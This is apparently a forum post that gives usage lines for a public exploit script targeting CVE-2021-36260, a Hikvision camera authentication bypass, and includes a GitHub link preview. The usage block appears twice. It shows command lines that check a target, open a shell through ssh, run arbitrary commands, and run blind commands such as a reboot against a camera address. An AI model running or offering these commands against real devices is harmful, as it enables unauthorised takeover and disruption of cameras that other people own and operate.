Hikvision Authenfication bypass exploit
Usage:
Check:
./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Open reverse shell by ssh:
./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Execute command:
./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "uname -a"
Execute blind command:
./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"
GitHub - rabbitsafe/CVE-2021-36260: CVE-2021-36260
CVE-2021-36260. Contribute to rabbitsafe/CVE-2021-36260 development by creating an account on GitHub.
github.com
Usage:
Check:
./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Open reverse shell by ssh:
./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Execute command:
./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "uname -a"
Execute blind command:
./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"